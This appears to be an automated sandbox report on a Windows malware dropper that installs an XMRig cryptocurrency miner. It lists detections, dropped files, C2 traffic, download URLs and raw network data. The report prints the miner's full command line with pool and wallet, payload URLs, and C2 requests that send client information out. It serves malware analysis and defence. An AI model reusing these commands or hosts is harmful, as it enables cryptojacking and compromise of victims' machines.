Analysis Report 8TD8GfTtaW.exe

AV Detection:

Antivirus detection for URL or domain

Source: https://blog.agencia10x.com/dance.exe	Avira URL Cloud: Label: malware
Source: https://blog.agencia10x.com/mex.exe	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: blog.agencia10x.com

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\evs.exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\jo.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Metadefender: Detection: 24%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\revs.exe	ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Metadefender: Detection: 21%			Perma Link
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: 8TD8GfTtaW.exe

Virustotal: Detection: 43%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\evs.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 31.3.jo.exe.860000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 31.2.jo.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 31.2.jo.exe.850e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.nulhfhsi.exe.3b0000.0.unpack	Avira: Label: TR/Dropper.Gen

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.528913817.00000247A05AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.395495832.0000000006A8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.310965675.000002ABFF28A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.395598364.0000000006AAB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.497823578.0000000000FA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.502678236.000002ABFF250000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.476502860.0000000004B5A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.295958006.0000000001840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.476458617.0000000004A5A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.498040430.00000000000F2000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.502700687.000002ABFF257000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.395324200.0000000006A7E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 5544, type: MEMORY
Source: Yara match	File source: Process Memory Space: RantimeBroker.exe PID: 6352, type: MEMORY
Source: Yara match	File source: Process Memory Space: cpu.exe PID: 6272, type: MEMORY
Source: Yara match	File source: Process Memory Space: nulhfhsi.exe PID: 6988, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Windows\CPU\config.json, type: DROPPED
Source: Yara match	File source: 6.2.lxoqz3o0.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RantimeBroker.exe.1130000.0.unpack, type: UNPACKEDPE

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.2.5:49730 -> 51.68.21.186:4444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42zyh6myztcdlqfmcpscggn8ppdku4pk16kh8uffytesddfwt5ihd2qfsws2bgnuwxwfnrtbjbr5w7dqgebrzdjcuzia53j./","pass":"x","agent":"xmrig/6.8.0 (windows nt 10.0; win64; x64) libuv/1.40.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/wrkz","astrobwt"]}}.

Found strings related to Crypto-Mining

Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp	String found in binary or memory: ID: 6272, Name: cpu.exe, CommandLine: "C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe" -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp	String found in binary or memory: ID: 6272, Name: cpu.exe, CommandLine: "C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe" -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp	String found in binary or memory: ID: 6272, Name: cpu.exe, CommandLine: "C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe" -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Source: conhost.exe, 00000011.00000002.528975552.00000247A08D0000.00000004.00000001.sdmp	String found in binary or memory: XMRig 6.8.0

Compliance:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\jo.exe

Unpacked PE file: 31.2.jo.exe.400000.0.unpack

Uses 32bit PE files

Source: 8TD8GfTtaW.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49744 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49745 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49746 version: TLS 1.0

Uses new MSVCR Dlls

Source: C:\Users\user\AppData\Local\Temp\jo.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.51:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.107.52:443 -> 192.168.2.5:49741 version: TLS 1.2

Binary contains paths to debug symbols

Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 8TD8GfTtaW.exe, 00000000.00000002.268372071.000000000139C000.00000040.00020000.sdmp, lxoqz3o0.exe, 00000006.00000002.498547574.0000000000100000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000E.00000002.501902431.0000000001140000.00000040.00020000.sdmp, revs.exe, 00000019.00000002.500038394.000000000041A000.00000040.00020000.sdmp, Chrome updater.exe, 00000025.00000002.500186949.000000000041A000.00000040.00020000.sdmp
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.6.dr
Source:	Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: nulhfhsi.exe, 00000004.00000002.444265627.00000000004B6000.00000040.00020000.sdmp

Spreading:

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\AppData\Local\Temp\evs.exe	Code function: 22_2_004062F0 FindFirstFileA,FindClose,		22_2_004062F0
Source: C:\Users\user\AppData\Local\Temp\evs.exe	Code function: 22_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		22_2_004057B5
Source: C:\Users\user\AppData\Local\Temp\evs.exe	Code function: 22_2_00402765 FindFirstFileA,		22_2_00402765
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_008B7AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		31_2_008B7AA8

Networking:

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49743

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.5:49730 -> 51.68.21.186:4444
Source: global traffic	TCP traffic: 192.168.2.5:49733 -> 87.251.71.75:3214
Source: global traffic	TCP traffic: 192.168.2.5:49736 -> 193.0.6.135:43

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /cpu.zip HTTP/1.1Host: 195.2.84.91Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: 87.251.71.75:3214Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/SendClientInfo"Host: 87.251.71.75:3214Content-Length: 1101816Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetTasks"Host: 87.251.71.75:3214Content-Length: 1080046Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/CompleteTask"Host: 87.251.71.75:3214Content-Length: 1080072Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/CompleteTask"Host: 87.251.71.75:3214Content-Length: 1080072Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 193.0.6.135 193.0.6.135
Source: Joe Sandbox View	IP Address: 104.23.99.190 104.23.99.190
Source: Joe Sandbox View	IP Address: 104.23.99.190 104.23.99.190

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49744 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49745 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49746 version: TLS 1.0

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.84.91

Downloads compressed data via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 23 Feb 2021 08:11:30 GMTContent-Type: application/zipContent-Length: 6296834Connection: keep-aliveKeep-Alive: timeout=60Last-Modified: Sat, 20 Feb 2021 21:11:22 GMTETag: "601502-5bbcb02b93280"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 01 7a 3a 52 67 77 19 1f bf 02 00 00 e3 08 00 00 0b 00 00 00 63 6f 6e 66 69 67 2e 6a 73 6f 6e ad 56 c9 6e db 30 10 bd e7 2b 02 9d 43 d7 76 e1 16 e8 2d 40 72 4b 51 20 69 51 14 45 61 8c a9 b1 c4 9a e2 b0 43 ca 4b 8b fc 7b 49 79 89 44 d3 45 0e 95 01 43 9a c7 19 3d 3e ce a2 3f 57 d7 e1 2a c0 aa e2 c3 f5 fe a1 33 a8 32 3c 9b 56 eb 9b 17 db 86 78 85 2c 4e 50 87 3c ef 17 14 b5 f7 76 18 02 0d 2c 34 c6 c5 4b d0 0e 7b 81 6a 72 3e 98 8b c9 f4 fd 68 1c 7e 93 a2 07 5a e2 08 8e 7b 26 90 12 9d 13 9e 56 68 ce 69 31 3a cf 4a fa ee 55 9e 5b 1c f0 82 d6 93 83 35 1e b0 83 75 01 72 55 31 b5 26 a1 57 48 d2 c4 6e bf f8 68 f3 ca eb c4 9f c1 94 d4 6c 13 cd 8c 8a cc c5 e4 66 68 13 b0 de 4e 53 a0 a1 32 c6 ec f8 f5 b7 3f a9 16 c2 42 85 2e a3 1b 97 8d e3 01 91 ce bc e1 ac 59 82 ac 71 fe 8b 72 91 4c db c0 b9 87 93 0c 5e d6 16 ca b9 65 5c 62 b8 9f 1f 78 4e 06 a2 4a db 5e 3a eb 24 64 dd 56 78 da cf 45 4c fc 54 3e 97 27 1b 01 e8 ce 4f dc b2 22 56 7e 77 8e 34 d8 10 ef 84 25 d2 99 78 3b 85 3a c3 b1 81 ad f0 35 23 94 4e d4 ca 44 26 93 f1 20 ff 5c 73 ee 05 5c 91 99 0a d5 58 9d f0 e8 3c 3c d3 62 e3 45 8c ed d4 ef 28 e1 6c d6 8f 29 cd 9b 71 86 a2 34 42 2b 8f 59 6c 05 1b 4b 9b 23 30 38 10 b2 68 a4 7e 6d fd 75 99 71 be 23 4d 50 22 67 e4 d6 e0 97 c4 51 83 e2 f6 e3 5d 3f 5b a1 d4 99 c4 fb c7 d6 fa 5b 1b a6 54 5b c2 6b f9 5f 22 6a d6 cd ff a2 53 92 01 8f 42 e3 1a 63 c8 c9 d0 4c eb d0 07 2d d3 76 d7 c3 34 55 62 a9 34 0e 78 15 31 15 63 0a 7f 3f bd f9 65 8b dd 02 d0 15 ed 5d 0e 2e 2f 0c 49 99 3c d2 72 24 75 60 33 5a 4f 47 db 86 55 35 92 d4 7c 78 1b ae 22 5d ee 3a b5 8a 6f 9f be 3c ce bf de 3e 3c dc 7f 9e df de dd 3d de 3f 3d a5 4b 2d b8 c8 b6 d8 a6 40 88 2f 4e 9d 3f c1 8c 92 58 83 ab 8f 4a 26 f0 0a d1 82 56 6b bc 80 5f 6a 1e 1d e8 3b f5 96 19 b7 80 04 bd 4d 85 6c 79 5f b5 19 6a 25 84 8e 60 2e 44 70 24 57 6e 96 77 74 a8 97 22 fc a1 f4 fd 71 17 af e7 ee ee c7 f1 80 e3 cb 85 57 4d dc de bb 43 89 17 35 82 f6 b5 c8 83 65 a3 92 71 82 61 82 75 9d 6e d6 b3 84 3e 06 e1 e8 7a 56 b7 73 21 cb 92 91 e5 b5 7b 6d e1 84 94 f5 24 f7 09 99 d4 8e 44 f6 79 eb 7c 85 99 4e 2b 95 ad 91 dd 45 a0 0d b5 95 41 cb 30 5d 18 9a dc 17 44 cc 52 11 a6 41 72 94 45 a8 b5 05 75 32 1c f5 db c4 29 35 54 b0 53 4a 90 11 0b f0 1e 79 77 2a ea e7 ab bf 50 4b 03 04 14 00 00 00 08 00 54 22 55 52 75 cb 47 e4 24 f1 5f 00 a8 20 69 00 07 00 00 00 63 70 75 2e 65 78 65 ec 5a 67 38 9c c1 16 5e bd f7 1e ac 2e da 25 11 2d 08 bb ca ea bd 5b 96 d5 3b 57 09 82 20 08 a2 13 bd 44 59 9d e8 65 b5 25 88 84 10 82 88 16 36 ba 10 5c d1 89 bb dc de ef cf fb e3 ce b3 fb 9c ef 9b 79 e7 cc 99 73 e6 9d 6f bf 39 ab 65 9e 0c c0 01 00 00 b8 98 ef f5 35 00 d0 0e f8 43 01 01 fe 73 b9 87 05 00 90 b3 75 90 03 9a 89 46 39 da b1 34 47 39 0c 9d 9c 7d d8 bd bc 3d 1d b

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /cpu.zip HTTP/1.1Host: 195.2.84.91Connection: Keep-Alive

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: iplogger.org

Posts data to webserver

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: 87.251.71.75:3214Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Urls found in memory or binary data

Source: lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmp	String found in binary or memory: http://195.2.84.91/amd.zip
Source: lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmp	String found in binary or memory: http://195.2.84.91/cpu.zip
Source: lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmp	String found in binary or memory: http://195.2.84.91/nvidia.zip
Source: nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.71.75:
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.71.75:3214
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.71.75:3214/
Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.71.75:32144
Source: nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.71.75:3214t
Source: nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmp	String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
Source: nulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmp	String found in binary or memory: http://bitbucket.org
Source: 8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmp	String found in binary or memory: http://blog.agencia10x.com
Source: nulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://bot.whatismyipaddress.com/
Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertBaltimoreCA-2G2.crt0
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: nulhfhsi.exe	String found in binary or memory: http://checkip.dyndns.org
Source: WinRing0x64.sys.6.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: WinRing0x64.sys.6.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: WinRing0x64.sys.6.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: WinRing0x64.sys.6.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exe	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertBaltimoreCA-2G2.crl0:
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exe	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertBaltimoreCA-2G2.crl0K
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exe	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
